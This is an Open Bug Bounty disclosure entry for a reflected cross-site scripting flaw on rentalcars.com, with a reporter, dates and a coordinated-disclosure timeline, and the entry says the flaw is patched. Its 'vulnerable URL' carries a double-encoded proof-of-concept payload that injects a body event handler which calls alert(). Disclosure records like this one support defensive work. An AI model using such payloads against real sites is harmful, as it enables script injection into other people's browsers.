rentalcars.com XSS vulnerability

2016-09-16T19:13:00
ID OBB:181967
Type openbugbounty
Reporter tbm
Modified 2016-10-25T19:33:00

Description

Vulnerable URL:
http://www.rentalcars.com/en/airport/gb/lhr/type/%2563%256F%256E%2576%2565%2572%2574%2569%2562%256C%2565%2522%253E%253C%2562%256F%2564%2579%252F%254F%254E%2570%2561%2567%2565%2573%2568%256F%2577%253D%2561%256C%2565%2572%2574%2528%2527%254F%2550%2545%254E%2542%2555%2547%2542%254F%2555%254E%2554%2559%2527%2529%253E/

Details:

Description| Value
---|---
Patched:| Yes, at 19.10.2016
Latest check for patch:| 19.10.2016 12:41 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank:| 2082
VIP website status:| Yes
Check rentalcars.com SSL connection:| (Grade: A)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 16 September, 2016 19:13 GMT
Vulnerability existence verified and confirmed| 18 September, 2016 15:43 GMT
Generic security notifications sent to website owner| 18 September, 2016 15:43 GMT
Notification sent to subscribers (without technical details)| 18 September, 2016 18:17 GMT
Vulnerability patched by the website owner| 25 October, 2016 14:10 GMT
Vulnerability details disclosed by researcher| 25 October, 2016 19:33 GMT